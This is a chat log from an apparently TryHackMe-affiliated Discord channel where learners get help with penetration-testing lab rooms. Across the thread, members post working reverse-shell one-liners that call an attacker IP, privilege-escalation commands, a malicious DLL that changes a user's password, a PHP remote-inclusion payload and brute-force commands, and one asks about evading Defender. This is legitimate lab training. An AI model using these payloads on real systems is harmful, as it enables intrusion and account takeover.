Solved it meanwhile ?

Sorry, had family stuff to take care of. Still can't figure this out

any pointers maybe?

Everytime I try to run something I get a bad request and the connection is killed

Did you enter the commands as explained in the task?

yeah. I get the connection and can retrieve the default page

but gI can't figure out the command to send to the host to retrieve the file

For the GET part of the command, what exactly did you enter?

GET /flag.thm and also GET /index/flag.thm

And what's the reply you get when you do that?

400 bad request

GET /flag.thm is this the full command you use?

no it's followed by http/1.1

K

I'll try myself right now, meanwhile you could maybe verify your thm profile in discord in order to be able to send screenshots, so you can provide such as it's easier to help if we actually can see what you do exactly

will do

!docs verify

thanks for the help

Okay, tried it right now and it works just fine, so I'm waiting for your screenshot 🙂

I'm somewhat ashamed to say this, bu i retried it right now and it works... 🙂

I typed thm as tmh

I'm dumb 🙂

Well, that's actually a good thing that it's working now, so nothing to be ashamed of 😄

lol

I just makes you feel stupid

thanks so much for taking the time to help

Gave +1 Rep to @shadow echo

Typos can happen pretty fast. You are welcome

it shows

allright on to the next one!

so its telling me to do this...and i did it

however, i cant find the difference in this one and the one they showed me to find the closed port that is now open on this VM

Scan it once without the -sT then once with it

Then see which service changed

ooohhhhh

i was looking at weather it was open or closed...thank you so much!!!

hello guys

how can you test a website

You're gonna have to be a tad more specific

Do you own the website?

no

i am not a E COMMERCE

how can you test a WEBSITE

thanks

If you don't have permission to, we can't help you

i am also a CYBERSEC NETWORK /INFO

ETH

can someone talk to me like a call

If you don't own it, don't touch it. Doing security testing on a site you do not own is illegal and unethical.

i am 18 yrs old from asia SINGAPORE

male

https://tenor.com/view/singapore-gif-5351211

As your question doesn't specifically relate to the Junior Pentester Path on THM, please take this discussion to #general

Hi

i am a ethical hacker of course i do not touch it

i am not a black hat hacker

need help on linux privesc room task 9 about cron job

i editted the script to reverse shell but i had to execute it manually to get the reverse shell. any explanation?

Which file did you edit ?

the backup one

Could you show a screen of the crontab ?

that's the crontab

Also one last thing, could you show the output of ls -al /home/karen/backup.sh you can just copy paste it, no need for a screenshot

Had the same issue. Yes, we have to change permissions for that file, so it'd be executable.

thank you i just spot the mistake

Gave +1 Rep to @shadow echo

about the deleted file, where do i have to create it to make the cronjob works? tried making it in karen directory but it's not working

/home/karen

Which deleted file you mean?

antivirus.sh

You have to check if you can write into any of the directorys listed in the PATH variable in the crontab, as cron will only check these directory for the file if the full path to it is not specified. So because /home/karen is not in that PATH variable of the crontab, it won't check for that file in there.

The example above shows a similar situation where the antivirus.sh script was deleted, but the cron job still exists.
If the full path of the script is not defined (as it was done for the backup.sh script), cron will refer to the paths listed under the PATH variable in the /etc/crontab file. In this case, we should be able to create a script named “antivirus.sh” under our user’s home folder and it should be run by the cron job.

it says something like that on the material. care to explain to me?

Yes, that's basically the same what I said. But the difference in the example is that the /home/user directory is specified in the PATH variable of the crontab (Check the 2nd image of the crontab in the example). Whereas /home/karen is not specified in the PATH variable of the crontab on the target machine.

ah i get it. thanks a lot

Gave +1 Rep to @shadow echo

Hi I need help for Linux priv esc task 5. I have sent the ofs file over with the simplehttpserver, and have compiled and granted it permission

When I tried running it, I got an error saying version 'GLIBC' not found (required by ./ofs)

You didn't compile it on the box, so it has different linked libraries.

You compiled it for a different version of libc

Ohh I see. Thanks James I'll try this after I eat 🤠

Completed this task! Cheers. I wasn't sure how to interpret that error msg but now I know :)

hi everyone im planning to take ejpt cert this coming Feb.. any tips for me or there is any site that offer mock exam like ejpt.. thank you everyone ^_^

Hey guys, I am walking through the nmap rooms, and am getting a bit confused in the difference between -pU and -sU, both seem to be using UDP? Or is -pU only used to find live hosts and -sU only to find open ports?

-pU or -PU?

Sorry, -PU indeed

-PU is a ping method, -sU is a scan method.

Ah okay, thank you.

I try not to rely on PU because it stinks...

dude, thanks. I got stuck on this one for a while. So decided to search discord for hints. I was on the right track and using curl, but couldn't figure it out until I went back and read the earlier "authentication bypass"... also, I like theres a chat history

Gave +1 Rep to @left gale

Why I'm not getting cookie after setting http server and using the exact payload ..(room:xss)

I am not sure which task in that room requires an HTTP server!?

Hi

Xssgi

I completed this room with tryhackme request catcher

I need help with metasploit exploitation. Task 6 under the jnr pen tester path.

I am finding it impossible to send a screenshot, so I can state what the problem is.

Please, I would really appreciate your help.

You can verify and send screenshots.

!docs verify

That's what worked for a lot of people here. (I am not sure yet what you mean with an HTTP server. Maybe nc listener?)

question about nfs on linux privesc room

Thank you so much.

Gave +1 Rep to @wispy nimbus

This is where I am stuck at.

i tried to mount target shared folder to my new folder under home directory but it wasnt sharing anything. but when i try to mount the exact same folder to /tmp/anything it's working. any explanation?

Please let us know what you have tried till now.

The task requires me to create a payload on my attacking machine and then download it to my target machine.

I created my payload, downloaded it to the target machine.

But the part where I have to get a metepreter session does not seem really clear to me.

Can i dm you

Yes.

Looking into this.

Thank you so much.

Gave +1 Rep to @wispy nimbus

What was the last command you ran and on which machine?

Did you setup the handler?

is linprivesc room broken ?

at task 8 (capabilities) vim/view was not compiled with python so i was not able to run ||./view -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'||

and also i was able to view the flag4.txt with karen's account without any privilege escalation

try with py3 instead of py

Yes I did. Even set the payload.

That would be exploit, on my attacking machine

And you got your shell?

No I did not.

Just repeating the steps:

1. Create the payload (LHOST and LPORT are your attacking machine's)
2. Upload it.
3. In a different panel, launch the handler after setting LHOST and LPORT and payload (!!!)
4. chmod +x the payload
5. Execute the payload

Thank you so much. I’ll try it out again.

Gave +1 Rep to @wispy nimbus

This is where I am at.

Nothing is happening.

Because that's only a listener (handler) which is waiting for an incoming connection, basically the same as a netcat listener. You have to execute the rev_shell.elf file on the target machine that you created in a previous step.

Now, I am also not sure if you set the payload in the handler to be the same as the payload uploaded.

How do I execute it ?

I did that.

Did you chmod +x the uploaded file? @merry bear

Yes I did that too.

@merry bear ./<file_name>

On my target machine

@merry bear Yes, where you ssh'ed in

Okay.

Wow. I got a session already. Thank you so much.

I really do appreciate your help.

+rep @modest arch

Gave +1 Rep to @wispy nimbus

That's just fair to me 🙂

I’m still stuck please. 😒

?

I need to dump hashes.

Without loosing your session :)

Is that possible ?

Yes. You need to background your session.

And ?

Find the module, change the settings. (you need your session ID)

Thanks.

Done.

Hi guys/ladies. I'm progressing through this path and so far everything has been fine. I've just got to the LinPrivEscPATH3 part where it talks about privilege escalation through PATH configuration issues and the creation of a binary with SUID enabled to run a shell creation script. Although I think I understand it, the machine for this task just didnt imitate the instructions and I found I was able to get the flag without doing much at all. Can anyone point me to another source of information on this particular subject as it seems pretty important. Thanks

Try Deja Vu

https://tryhackme.com/room/dejavu

ahh thanks Ninja 🙂 Appreciate the help

Gave +1 Rep to @idle bison

Howdy all. Running into issue with the Metasploit: Meterpreter room.
It wants a session before enum_shares can connect. I found that I can use ||psexec || to do that but When I try to connect I get this:

Exploit failed: RubySMB::Error::UnexpectedStatusCode STATUS_USER_SESSION_DELETED

What am I doing wrong. Googling around has led me to beleive this is on thm's end. If it's not can I not be spoonfed the answer please

nvm i typod the password.

When I do nmap scan for target machine it shows me like this anyone know why?

I do this in my lab not in tryhack me

Look up rttvar, there's some interesting stuff to try

stuck in linprivesc CRON not able to get revshell

its been 5 min

stick a ping ipaddress -c 3 after your shell command to see if its firing, and run tcpdump -i tun0 icmp on your attack box to catch it. You can then see if its firing at least

if you get the ping back, then you know the shell command hasnt worked and you can re-think why the shell doesnt fire.

shell's can be a pita, but persevere and try different versions. Always make sure to check the targets machines capabilities (which python3 for example) to make sure you're using an appropriate script

yep its pinging

i tried python3 , bash

not working

i tried switching from VPN to attack box not working

||sh -i >& /dev/tcp/attackboxip/4445 0>&1 , 0<&196;exec 196<>/dev/tcp/attackboxip/4445; sh <&196 >&196 2>&196 ||are they correct ?

both not working

tried python3 too

no, thats not right. if you want cron to execute it, it should start with #! /bin/bash

||#! /bin/bash
bash -i >& /dev/tcp/target_IP/port 0>&1||

dont forget to start a listener

do i need to make the file executable ?

I actually cant remember, but it wouldnt do any harm to chmod +x it 🙂

@urban whale /dev/tcp only works in bash, not in sh. It's something to avoid if you're not sure what shell you're using

let me try

I didnt know that Ninja. Thanks. TIL... 😉

Gave +1 Rep to @idle bison

I say only works in bash... I suspect it'll work in zsh and fish etc too

I'm not enjoying the Windows part of that course.

target_ip or attacker ip ?

the script should point back to your attacking IP

thanks @unreal plume @idle bison

Gave +1 Rep to @unreal plume

i got the sol.

\o/

i had to specify the listing IP on nc !

nc 10.10.233.133 -lnvp 9001

otherwise it was listening to 0.0.0.0

0.0.0.0 is ok. That just means its listening on all IP's and interfaces

then it seems like making file executable worked

chmod +x

🥴

Personally, I find it easier to just add to the cron job "chmod +s" the bash binary and run bash -p. Would work even if nc would not be installed on the target... @urban whale

How would I read a file or view a directory in ftp? For example…”flag_thm”

Or something like thst

Download it with wget on your machine then read it

Just finished this path. Thanks to everyone that assisted me on the way. Time to do some boxes!

Buen trabajo

How much time it took to you to complete this path??

Around two months

Dunno if that's considered fast or slow but i spent a few hours each day on it. Took a lot of notes as well. Not just reading and flying through it

Can you send me your notes??

Nah

My notes are just the material in my own words along with added bits of research here and there. You can develop something similar as you go through the path

Fine

Thanks

Gave +1 Rep to @round verge

Got a Q for room/linprivsec : Privilege Escalation: Capabilities
how come the GTFObins work like this: ./vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
but not like this: vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Just finishing this Jr path. In the Windows Vulnerabilities scanning, I'm not getting anything when using sc in a powershell window e.g. sc qc [nameofrunningsw]. Is sc broken on these boxes? (https://tryhackme.com/room/winprivesc)

strange. I would have thought it would be the other way around as preceding an executable with ./ generally means run from here.

unless you are in the vim path at the time you execute it (which generally you are unlikely to be)

sc is an alias for set-content in powershell. So either run that command in CMD or use sc.exe

Thanks Fontaene

Gave +1 Rep to @shadow echo

Because it's not using the vim binary that has the capabilities set. You can simply compare the path of the vim binary that has the capabilities set and the path of the vim binary that's getting used if you enter which vim

whats the simplest way to send a file from an RDP windows desktop back to my linux box?

cut'n'paste aint working 😉 (i.e. cant base64 encode and then cut'n'paste it across)

note to self, if you go to a php page and try to find a file, you might just break everything by having it load itself

lol

DoS'ing the THM boxes not a good idea 😄

luckily (?) I was on my own vm so I just terminated the machine and restarted vmware

in theory everything should be alright... maybe not I'm about to find out I guess

SSH [server] on the linux box and (e.g.) WinSCP on the windows box

Thanks Data. I ended up using Remmina as the RDP client on my linux box and shared my Downloads folder 😉

loving Remmina !!

Still on LinPrivSec - could itbe that the Privilege Escalation: SUID is borked?

• motd looks like the vanilla Ubuntu one,
• ssh login is also wierd (and not succeeding?)
• nano doesn't have the SUID bit (referred to in the instructions) `

nano SUID bit set in the instructions is just an example, doesn't have to be set on the target machine

is there a powershell reverse shell that wont get picked up by defender? Tried the ones in PayloadsAllTheThings but they all get stopped when executed

Room?

or am I going to have to obfuscate a meterpreter shell

Still stuck - ran the find command, got a list of bins with SUID, but no hits with SUID on GTFObins...?

https://tryhackme.com/room/winprivesc DLL_Hijack

...that has defender enabled?

yes

You sure? Iirc there should be something to use, but let me check myself again

I can get the dll injection to work but that just gives me whoami information. Was trying to go further and use the technique to try a reverse shell

FML - code-18~
GTFObins' search is order-sensitive 😓

PS C:\temp> sc.exe query windefend

SERVICE_NAME: windefend
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PS C:\temp>

I'd recommend holding off on AV Evasion for a while

ok. was enjoying the injection side of things and trying to get ahead 😉

So that means you found a binary to use now?

Yep - now to exfil /etc/shadow - but the SSHd is still borked

What you mean by that, what exactly is happening ?

OpenSSH_8.4p1 Debian-3, OpenSSL 1.1.1l  24 Aug 2021
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf matched no files
debug1: /etc/ssh/ssh_config line 21: Applying options for *
debug1: Connecting to 10.10.<redacted> [10.10.<redacted> ] port 22.
debug1: Connection established.
debug1: identity file /home/kali/.ssh/id_rsa type -1
debug1: identity file /home/kali/.ssh/id_rsa-cert type -1
debug1: identity file /home/kali/.ssh/id_dsa type -1
debug1: identity file /home/kali/.ssh/id_dsa-cert type -1
debug1: identity file /home/kali/.ssh/id_ecdsa type -1
debug1: identity file /home/kali/.ssh/id_ecdsa-cert type -1
debug1: identity file /home/kali/.ssh/id_ecdsa_sk type -1
debug1: identity file /home/kali/.ssh/id_ecdsa_sk-cert type -1
debug1: identity file 

Well tbh I don't know what sshpass even is? But why don't you simply use ssh karen@10.10.243.13 ?

And from which machine are you running that command ? From the web based target machine ?

A way of specifying an SSH password at the commandline

Running it from my local box on the VPN
sshpass -e answers the password prompt for you

hehehe (read above)

I've found a problem with the DLL Hijack Service in the https://tryhackme.com/room/winprivesc DLL_Hijack room. Once you've tested the initial exploit to get the whoami information, you are unable to replace the hijackme.dll with the modified version for question 2 as the original dll is in use. Trying to stop the dll service (sc.exe stop dllsvc) doesnt work (privilege violation). Should I just restart the box?

The real question is... why are you using sshpass?

for CTFs/ exercises (and non-sensitive credentials, obviously) it saves lots of keystrokes (and works with scp too

#junior-pentester-path message
Any ideas? (using a reverse shell instead 🤷‍♂️ )

Can I try to ssh into your target machine to check if it's an issue with the machine or on your side?

sure! (DM'd you)

Completed 🙂 On to new courses....

Whats after this??

I gotta say, SQL injection by hand, especially blind timing... Isn't great 😃

There’s nothing designated so you can progress to whatever takes your fancy

Hi, in the netSec challenge, i cant do this question

Browsing to http://10.10.218.195:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

i have tried TCP Connect Scan and TCP Syn ( -sT and -sS ) with T1 to avoid IDS detection but it take too much time

how have you resolved this question ?

You don't have to over complicate it by using -T1 or whatever, if you pick the right scan type you should be fine.

the flag should appear on the url after ?

I think just on the webpage yes, so not in the url bar, if that's what you meant

Yes

so you've tried -sT and -sS, keep going with that same line of thought and see what you get.

I had a huge problem with that question for some reason, but then I stopped using db_nmap rather than just straight up nmap and I got the result very quickly

yes

InLinPrivEscCRON but the cron jobs don't seem to be running every minute, as specified...? (touch nor reverse shell are firing)

Check the permissions of the file

...nothing on that in the tutorial! 🤦 (got it now 🙏 )

Is the Walking an application's inspector task broken? I'm making the premium block disappear, but the flag doesn't show up and I can see the div where it should be appearing in the inspector remain blank as well 🙂

ahh. nevermind ... see the issue

in "Walking An Application" in the debugger section they talk about a flash that I should see on the website and that I can find in the assets

but I don't see any flash and there's no flash file in the assets

I restarted the machine, same

linprivsec:NFS can anyone explain why a c-program calling /bin/bash (admittedly with setuid(0) calls) and SUID bit results in a root shell but a bash script calling /bin/bash, also with the SUID bit set, results in a shell under the current user?

Evening guys, could I get some help with this issue?

it says the ffuf command not found

Using Parrot.

sudo apt install fuff

THANK U

I'm having a lot of trouble with this one answer in room Linux PrivEsc Task 3

What Vulnerability seem to affect the kernel of the target systen

Sweet Cert #5..

OSINT go brrrrrr

so thats easy... you kind of already answered it (assuming youre working in order) you have to goto to https://www.exploit-db.com/ and look up the version of the kernal you found earlier

How long is the hydra scan supposed to take in the netsec challenge?

If it's more than 5 min ur doing something wrong

if you scanning "root" dont

think you supposed to scan "missy"

if thats the task im thing of.. but theyre super fast..

shouldnt be more than 30 secs

Not missy

one sec.. think im thinking of a task or two later where i scanned using hydra but wasnt in the task..

what username youscanning?

Got it. It was a different port

youll see what im talking about at some point.. youll crack into the /etc/shadow file and there will be two hashes.. one for root and one for missy.. scan missy.. not root

i sat there for like 15 min.. then saw missy.. 🤦‍♂️

Is it necessary to have a system or laptop with higher RAM ?

Not really unless you want to run large local VMs is all I can think of

Okay i use a dual core system but sometimes got hanged to work

CPU/GPU could be relevant to cracking hashes or something but this should be mostly about figuring out what small pieces of unexpected data to send 😛

Fully suggest using the built-in Attack system if you have low resources. Works great if you're on a lower spec machine without the ability to run a VM

a basic Linux VM needs a min of 1 CPU and 1Gb Ram, but in reality being able to dedicate 2 CPU cores and 4Gb RAM will give you a better experience

@signal oak are you on contact page and looking at devtools sources tab?

I have 3GB RAM intel dual core PC and it still get hanged sometimes

3GB of RAM is not a lot, and a dual core is not a lot.

in all honesty, unless you are running Linux as the core os of your laptop, I would stick to using the attackbox in a webbrowser

Yes i have Ubuntu Linux install, but the machine on the web browser isn’t connecting

I figured it out yesterday thanks ! I wasn’t on the contact page

Gave +1 Rep to @vernal stream

finally

bump?

missing -p flag

       If  the  shell  is  started  with the effective user (group) id not equal to the real user
       (group) id, and the -p option is not supplied, no startup files are read, shell  functions
       are  not  inherited  from the environment, the SHELLOPTS, BASHOPTS, CDPATH, and GLOBIGNORE
       variables, if they appear in the environment, are ignored, and the effective  user  id  is
       set to the real user id.  If the -p option is supplied at invocation, the startup behavior
       is the same, but the effective user id is not reset.

according to the manual page

is shadows assumption.... might be wrong though

cool - I'll try /bin/bash -p in the executable 🙏

good luck

I can't access the Acme IT support website

the website won't load

did that happen to anyone

I restarted the machine but the new IP is still not working

are you connected to the vpn??? if not that is the cause

do I have to be connected to the VPN ? in the previous room I was accessing the website no problem

yuup you need to be connected to the vpn... or be using the attackbox to connect

I guarantee you I was accessing the website on my regular browser on my regular PC

but I'll try that

I'm seeing it right now in my history

and I've never been connected to any VPN ever

If it's 10.10.x.x, then you'll need the VPN or attackbox.

yesterday I accessed a 10.10.x.x website and I didn't use attackbox nor the VPN

I still have the IP in my history

Help! Im stuck on protocols an servers 2. password attack. Here is the hydra script im running and I am getting nothing

heres the error

I'm stuck on challenge 1 of File Inclusion

I edited the request in developer tools and resent it but it doesn't work

nm! solved it

never mind I got it

hello I am struggling with content discovery task 3. I found the md5sum hash value but it is not on the owasp website?

Not possible through sheer laws of networking.

That might just be a website on their local network
Like my uni WiFi uses a vpn and gives ips like 10.5.x.x
And our online library is also on some ip like 10.10.x.x

I'm stuck on File Inclusion lab challenge 3

I have no idea what to do

I tried curl -X POST http://10.10.216.82/challenges/index.php -d 'method=POST&file=../../../../etc/flag3%00' --output -

and that didn't work

good guess

otherwise it's not possible that's a priv ip

Yep

i'm stuck on username enumeration of authentication bypass, it says directory not found and I did it exactly like they said

Ok, so if it can't find the file there, perhaps it's not there? Perhaps you typo'd the file path hint hint

did anyone explain why the hash doesn't show in the list?

I'm stuck at the same point

Content Discovery Task 3

because the address is wrong. it has to be "curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum" like this.

@modest arch Thank you!

Gave +1 Rep to @livid drift

welcome

Subdomain Enumeration task 6, I am having issues with the -fs {size}. I found the answers ||delta || and ||yellow|| because I looked through it manually but I must have some simple mistake I'm not getting with -fs {size}?

you don't use curly brackets. use as -fs 2395

@modest arch thank you, I probably need to build up my Linux skills more than what the pre-security course offered

Gave +1 Rep to @livid drift

you're welcome! have fun learning 🙂

Having trouble using the attackbox for Vulnerability capstone. What am I doing wrong?

That error is a good one to watch out for.
Python 2 had print as a keyword rather than function, so you'd print name rather than print(name).
When you see that error, the script is written for python2

hello guys!! totally new here...can anyone suggest where can i start with😅

#start-here #rules

👍

Could someone get me a sanity check on the Windows Privesc Room, Task 5?

Sure, so what you stuck on or what you want to know ?

I'm following the explanation, but I can't login with the new password, should I PM you with my code or should I just put in here?

No you can just post it here

First I created my malicious DLL with

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k net user jack qwerty");
        ExitProcess(0);
    }
    return TRUE;
}

and x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll.
Then I start my http server and download the DLL to C:\Temp\hijackme.dll
Afterwards I run sc.exe stop dllsvc (tells me that it's not started) and sc.exe start dllsvc
Finally I try to open a shell as jack with runas /user:jack@Jack-DLL "powershell"
which tells me that the user name or password is incorrect.

So you name the dll "output" ?

no, I download it as hijackme.dll, just edited my message

So instead of using runas, have you also tried to rdp into the machine with the new password ?

Also, I'm not sure if it somewhat is related to the password, but I would also suggest trying to use the suggested password in the hint, not sure of that password is somehow not accepted because it's to short or has no numbers or something similar to it

I can't rdp into the machine, because I get an error that kerberos isn't initialized

will try it again

Mh, well then maybe try to restart the target machine, then go with the suggested password from the hint and also try to run the provided stop and start command in cmd. Other then that I guess there is not much else.

in the file inclusion room they say Note that we used 4 ../ because we know the path has four levels /var/www/html/THM-4. But we still receive the following error:
then the error shown is Warning: include(languages/../../../../../etc/passwd.php): failed to open stream: No such file or directory in /var/www/html/THM-4/index.php on line 12
so in the error there's 5 ../, I tried it myself and it gives 4 ../ so I don't get it, even after that they keep showing errors with 5 ../

alright, thanks, I'll try it

Gave +1 Rep to @shadow echo

Because there is no file called "passwd.php" you have to find a way to get rid of the ".php"

I know I'm talking about the number of dot-dot-dash's

it's 4 then it's 5

to me it would have been 5 since the beginning because there's the included directory

but they specifically say that they use 4 ../

then in the errors it's 5

so I'm confused

Which task is it btw ?

Local File Inclusion - LFI #2

Have you tried the same on the target machine and you also got 5 times ../ instead of 4 or you just refer to the image in the task?

when I type 4../ I get 4 in the error

in the task they use 4 and they get 5

Okay well then maybe that's just a mistake in the tasks image, I'll try it myself and in case there is only 4 in the error I'll report it 🙂

alright thank you

don't forget to mention me I want that reward

Well there is no reward beside the appreciation to bring that up and some rep 😄 +rep

Gave +1 Rep to @signal oak

on the feedback page they say "Useful feedback may result in awards!"

Knowledge gained: It worked after I used runas /user:jack "powershell.exe"
So you don't have to specify any domain apparently

That's for useful feedback delivered via the form.

that's what I said

Bugs would be reported through #room-bugs

Or another channel for Discord staff directly reporting bugs, not via the form either way

oh ok

english not being my first language I thought feedback meant anything related to reporting something wrong

It can, that's just not the process that's followed here

I see

I've been trying the remote file inclusion challenge for a couple of hours, now I've watched a walkthrough and I was doing the same thing the whole time but it doesn't give me the flag

I have a cmd.txt with the text <?PHP echo exec("hostname"); ?>, I start a server on the same folder as the file (with default port so 8000), then I go tohttp://the.website.ip/playground.php?file=http://my.vpn.ip:8000/cmd.txt

all I get is File Content Preview of http://my.vpn.ip:8000/cmd.txt

without nothing following

cmd.txt ?

Perhaps, as it's PHP, a different extension would be appropriate

ok I'll try that

Are you getting hits on your HTTP server either way?

good question I don't even know

thanks for the tips I'll try that

wait I'm supposed to see the HTTP requests in the terminal below the python server running

so no I don't get requests

I checked my IP, and the port, I don't know what's blocking it

it works when I request cmd.txt directly

but not via the website

Sorry if this has been asked before. Brute force section of authentication bypass I tried outputting the result but I don’t see it. Doesn’t return an error

Can someone please help me?

Check your valid usernames file, it's not supposed to have any other strings in it except the username (1 per line). So no status codes, size etc.

So I did: cat [pw file directory]. I can see all the password, same for the usernames

So in the previous task you found valid usernames, right ?

Yes I did and answered the questions

So then you created a new file with these usernames, right? If so, do cat usernames_file and let me see the output pls.

Can’t post photos unfortunately but: cat valid_usernames.txt returns
a****
r*****
s****
s****

!docs verify

If you verify you can send screenshots.

Okay I’ll very thanks

Here is the result I’m getting

I don’t know what to add to see the working user/pw combination

Think about what you're sending to the webserver

You could even proxy ffuf through burp to see exactly what it's sending

If I’m not mistaken, I’m looking for which combination returns response status 200 right? How can log each attempt?

Look at your valid usernames file. For example, admin is a valid username. But in your file it's going to try the username admin [Status:200, Size: 370, Words: 992,] which is not a valid username anymore.

Oh that makes sense! 😮 I see what I did wrong. Thank you so much!

Content discovery room, task 6 i couldn't find the flag

can i have some coupon code to apply for premium subscription? i really want to learn more and i am broke

you could win 1 free month there's a giveaway going on in #community-announcements

I'm still stuck on that

it won't access the file and I don't see any request server-side

I tried changing ports, opening ports inbound and outbound

I'm sure it would work via the attackbox but I want to know why it's not working on my machine

I'm using WSL btw

maybe that's the source of the problem

thanks. fingers cross

Gave +1 Rep to @signal oak

I'm stuck on task 8 Practical Example (Blind XSS) of Cross-Site Scripting. I can't get the code to work

this is what I'm doing . I'm also runnig netcat set to listen on port 9001

You sure your tun0 IP starts with 10.6 ?

If you manually open that ticket, do you receive the request with your own session cookie ?

I'm sure my IP starts with 10.6 and I don't

Then maybe try restarting the target machine. If you previously created a ticket with a bad payload the machine might be messed up, at least that's what I encountered. If that also doesn't help, try with the request catcher or attackbox.

@shadow echo thanks it worked

Gave +1 Rep to @shadow echo

How can I save the output of ffuf to a file?

ffuf --help
Look under output options.

Thanks! -o it is. Should have checked that first.

Gave +1 Rep to @wispy nimbus

You might want to change the format, as JSON is the default format. For CSV you would add -of csv

nice, thank you!

Gave +1 Rep to @wispy nimbus

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.93.128/customers/login -fc 200 - running this command to find a valid username/pw. Outputting the file as a .txt. Can't find any valid results there? Sorry, I seem to oversee something here.

Can you please make first of all sure, valid_usernames.txt is in a valid format - One username per line and nothing else?

Mvp! It solved it. Thank you!

Hi Guys, does anyone know the command's for protocols and servers room for SMTP really annoying me to get the flag

thank you

Looks like it wants you to connect via FTP?

Sorry, telnet

Not FTP

Yes I have telnet to the box and ran the commands helo telnet and also mail from:enter

it's the rcpt to: that it say's syntax error or recipient not found

Minute, I'm firing it up

👍

Dude. Look at the message you get as soon as you open the connection.

Read the whole thing.

OMG I think I need to go eat lol

ok ngl the file inclusion room

is really freaking cool

👏 to whoever made it

huh ...getting stuck in the authentication bypass room's brute force ...pretty sure I'm entering the command right, am getting no errors, but no valid user/pass either.

My valid_usernames.txt looks like this:
admin
ro____
st___
si___
The command I'm running is:
ffuf -w ~/valid_usernames.txt:W1,10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlen
coded" -u http://10.10.52.201/customers/login -fc 200

The usernames file should only contain the usernames (1 per line) and nothing else, so no status codes, size etc.

@shadow echo I put my exact valid_usernames.txt in the message, only replacing some letters with _ to not spoil

Did you create that file manually or did you edit the output file from the previous task?

As then you should create a new file from scratch, so without ffuf and write the usernames manually in it

@shadow echo I made the file in nano, just username enter username enter username enter username ^x, but no dice. I eventually just took out the w1 valid_usernames.txt and put in the username myself in the data param manually

@shadow echo Sorry for the ping, but I think I know what issue some users might be running into, ran into it myself. On a kali VM, when I ran the command, I also was getting no results. When I removed the filter portion of ffuf, I saw that it wasn't checking W1 normally, but instead "stevetW1":

The "t" was curious to me, and when I reopened the file in Nano, I saw that it was exported from Mac format. I went to save it, this time as Dos format (alt+D), and it started working:

So when you verify that they have nothing extra remaining in the file, you might have them open the file up in nano and make sure it's in DOS format

Hey 🙂 Right, that's why I'm suggesting them to create a new file from scratch instead of editing the output file of ffuf because of that format issue. 🙂 But thx for pointing that out.

Gave +1 Rep to @coral radish

Hey guys, quick question. Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/ if I want to decode that string which is: eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ== on crackstation, I don't get any result.

Ahhh, nevermind. Got it!

Hello all, just a quick question. I'm doing the metasploit exploitation room and it says to exploit one of the target VM's vulnerabilities. I've used the suggested exploit, but I'm wondering how would I know to use this in the real world. Is this trial and error? Or is there a type of scan you could use?

thanks!

Well you could for example try nmap scripts, like the vuln category or do a service/version scan on the target and if you get to find the versions of the services looking them up on exploit-db. So just trying a bunch of different exploits might not the best approach.

I'm having trouble with Command Injection task 5. It says a split view window should open when you deploy the machine. I did that and it didn't work.

Should be a blue button at the top of the room that says "Show Split View"

@amber rapids thanks

Gave +1 Rep to @amber rapids

I'm not entirely certain what the question is asking for in file inclusion task 5's question on lab 6. Wha directory needs to be in the input field? For what?

The os-release file contains a version id. So if you manage to get to read the os-release files contents you should be able to find that version id.

the question before that. It needs a directory, probably along the lines of the final example in the task, but the only directory I see that fits is a few characters too short

Oh, my bad, let me check

the directory that makes sense to me is inc......, but that's 8characters, not 11

So if you enter any bogus input in the input field, you get a message that you are only allowed to include files from a specific folder.

yup, I did that 🙂

the error includes, rather ironically, includes/bogus. so the answer should be that directory but it appears to be 3 characters too short? 🙂

You sure you are in lab6 ? As when I enter for example asdad in the input field and press the include button there should be only 1 possible folder to be found for the answer.

🤦

I'm looking at lab5

yup. now its as obvious as godzilla on a spring day 🙂 thanks for humoring me 🙂

@shadow echo thanks

Gave +1 Rep to @shadow echo

there, forgot to give you the rep 🙂

hi all, i'm doing the xss room from and i'm stuck on the DOM-Based XSS. I'm supposed o edit the script to create an alert showing the page cookie. I've tried with the hint and write up and doesn't seem to be working. Not sure what I'm doing wrong. Any help with that?

@turbid folio what happens if you try?

I am not very lucky in finding the Directory listing flag, am I just not looking in the right place?

Its just in the Viewing the Page Source one

ah wait had to read things, gonna try one more time

yay figured it out

Finally got the vulnerability capstone down! It felt so awesome getting a reverse shell and finding that flag.

In the room Nmap: post port scans, I am unable to solve task 3 using the nmap -O <Machine_IP> command. I get the output as the no exact OS matches for host followed by a TCP/IP fingerprint. Can anybody explain why is this happening? Although I was able to solve the task using the OS detected while running the nmap -sV <Machine_IP> command.

Hello Folks,
Spent more than 8 hours to solve the RFI/RCE challenge.

I was exposing the remote php code from my laptop, via python http server, then 'ngrok'ed it. Server was always giving empty reponses. Spent 8 hrs battling this.

Now I copied the code to attackbox and accessed the code hosted in attackbox, the server returned the host name. Solved the problem in 5 mins.

Any idea, why it didn't work with ngrok url given the code is same?

Code Sample: ||<?php echo shell_exec("ls -l /etc/hosts"); ?>||
URLs:
http://7257-2409-4072-10c-ac09-9180-xxxx-xxxx-xxxx.ngrok.io/check.php -- Didn't work
http://10.10.xx.xx:8000/check.php -- Worked

Targets don't have internet access

